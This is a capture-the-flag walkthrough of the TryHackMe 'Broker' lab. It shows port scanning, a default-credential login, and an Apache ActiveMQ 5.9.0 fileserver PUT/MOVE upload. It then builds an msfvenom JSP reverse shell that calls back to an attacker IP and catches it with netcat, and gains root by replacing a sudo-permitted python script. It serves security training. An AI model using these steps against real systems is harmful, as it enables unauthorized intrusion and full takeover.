Challenge Link : https://tryhackme.com/room/broker

Initial Enumeration

As usual I started with nmap scan or rustscan for faster result using the command show below.

❯ rustscan 10.10.31.48 --range 0-65535 --ulimit 5000 -- -sC -sV -Pn -o nmap.txt
.
.
.
PORT      STATE SERVICE    REASON  VERSION
22/tcp    open  ssh        syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4c:75:a0:7b:43:87:70:4f:70:16:d2:3c:c4:c5:a4:e9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0E0J6enJ0afxy700qSiIX5MtF1OnZao36BxMDHd4z3X/fbRQc3WOsCzY9KsTw7RltG4bSBJGja3ppRbiLTowv+2aunR3nKPaR/Rea1NFCHPxonnYutUyqPsJIRnm+oV+hqd/rvn/BgLpdNo2bpWG1PG3gNVwmbuUqybL9XF3KoZz8gj6zZPJ+RV8yrM17R2bd1J7YgTMJBKSuKyzVQZJQHJMhdBLBOfVmF3PgajXe2Dm10xbL2rQ3Zsbbuk6hhc4Ypq1LYeZ1PA0aNuHoMzhjXlYQ3XElD5Rzr6rBo5LJr2VD2Y3mo86wyM6OZBb+B88Law3RJ4fwtjVgEoa2KX0F
|   256 f4:62:b2:ad:f8:62:a0:91:2f:0a:0e:29:1a:db:70:e4 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHyqJ0DAEyEKxeir3lNhPLTZNtDo/CfpLAKWpiSxZUd8NJIrcsNod31Tl+KSwMvNjNvW2ilD1YYxnO2A3FDApqg=
|   256 92:d2:87:7b:98:12:45:93:52:03:5e:9e:c7:18:71:d5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINqDlHwUjvqNDfhowAQHQMu7A/HVUijCXkxdkgpF/pSe
1883/tcp  open  mqtt?      syn-ack
|_mqtt-subscribe: The script encountered an error: ssl failed
8161/tcp  open  http       syn-ack Jetty 7.6.9.v20130131
|_http-favicon: Unknown favicon MD5: 05664FB0C7AFCD6436179437E31F3AA6
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: Jetty(7.6.9.v20130131)
|_http-title: Apache ActiveMQ

There is a website on port 8161 and probably the way to gain initial access, I tried to access /admin but it is protected using http basic authentication and then I thought to try some common credentials and admin:admin worked.

I found that software used is Apache ActiveMQ with version 5.9.0, So let's search for a publicly available exploit.

Apache ActiveMQ

I found the exploit which is also available in metasploit but that didn't worked so I thought to give it a try manually, you can find a detailed explanation for this exploit here.

According to the exploit we have to upload a file to /fileserver/ using PUT method but files available on /fileserver/ doesn't have execute permission so for that we have to use MOVE method to move the malicious file to /admin/ location.

So first of all we are going to find the actual path for /admin/ directory and for that I visited /fileserver/ and intercept the request using burp suite.


PUT /fileserver/%80/%80
Host: IP:8161

Response :-

HTTP/1.1 500 /opt/apache-activemq-5.9.0/webapps/fileserver// (No such file or directory)
Content-Length: 0
Server: Jetty(7.6.9.v20130131)



We have the actual path for all the files, now we have just have to upload the reverse shell in JSP format using PUT Method.

❯ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.6.64.121 LPORT=1234 -f raw > shell.jsp
.
.
.
PUT Method

But when I checked the response, it said HTTP/1.1 401 Unauthorized because I forgot to provide HTTP Basic auth credentials. So I intercepted the request again for /admin/ and in that request, I found this thing Authorization: Basic YWRtaW46YWRtaW4=

Great now we just need to use this in our PUT request so that uploading the reverse shell will not give us the previous error.

uploaded

We have successfully uploaded the JSP reverse shell but we can't execute it from /fileserver/, now we have to move this shell.jsp to /admin/ directory and for that we know that  /admin/ is at /opt/apache-activemq-5.9.0/webapps/admin/.  For this we are going to use Burpsuite again.

MOVE

Perfect, now we can execute shell.jsp by visiting /admin/shell.jsp and don't forget to listen on the specified port using nc to catch the reverse shell.

❯ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.6.64.121] from (UNKNOWN) [10.10.31.48] 35848
id
uid=1000(activemq) gid=1000(activemq) groups=1000(activemq)

Privilege Escalation

It's time for privilege escalation, I found that we are inside a docker container so may be we need to escape from it somehow.

[email protected]:/opt/apache-activemq-5.9.0$ cat /proc/1/cgroup
cat /proc/1/cgroup
12:blkio:/docker/a0ecdd51642f19743a3c2e5b0f0d284a6953bbf19e160b83404ee0a3277ba7e5
11:cpuset:/docker/a0ecdd51642f19743a3c2e5b0f0d284a6953bbf19e160b83404ee0a3277ba7e5
10:cpu,cpuacct:/docker/a0ecdd51642f19743a3c2e5b0f0d284a6953bbf19e160b83404ee0a3277ba7e5
9:perf_event:/docker/a0ecdd51642f19743a3c2e5b0f0d284a6953bbf19e160b83404ee0a3277ba7e5
8:freezer:/docker/a0ecdd51642f19743a3c2e5b0f0d284a6953bbf19e160b83404ee0a3277ba7e5
7:pids:/docker/a0ecdd51642f19743a3c2e5b0f0d284a6953bbf19e160b83404ee0a3277ba7e5

Umm...but that's not the case we don't have to escape from the docker to gain access to host machine because running sudo -l gives us user privileges.

Matching Defaults entries for activemq on activemq:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User activemq may run the following commands on activemq:
    (root) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py

So I renamed the subscribe.py to djfkl.py and created a new subscribe.py with the following content:

[email protected]:/opt/apache-activemq-5.9.0$ **mv subscribe.py djfkl.py**
.
.
.
cat subscribe.py
cat subscribe.py
#!/bin/bash
import os
os.system("/bin/bash")
[email protected]:/opt/apache-activemq-5.9.0$

Now running subscribe.py as user root gives us the root shell and also the root flag.

sudo -u root /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
sudo -u root /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
[email protected]:/opt/apache-activemq-5.9.0# cd /root
cd /root
[email protected]:~# ls
ls
root.txt
[email protected]:~# wc root.txt
wc root.txt
 1  1 24 root.txt
 

We are root now and this completed the challenge. One thing that is not clear to me, what was the need of docker? Does apache activemq needs to be run on a docker or something else? If anyone can explain then please contact me on discord cyberbot#1859.

NOTE: The awesome artwork used in this article was created by chubasan.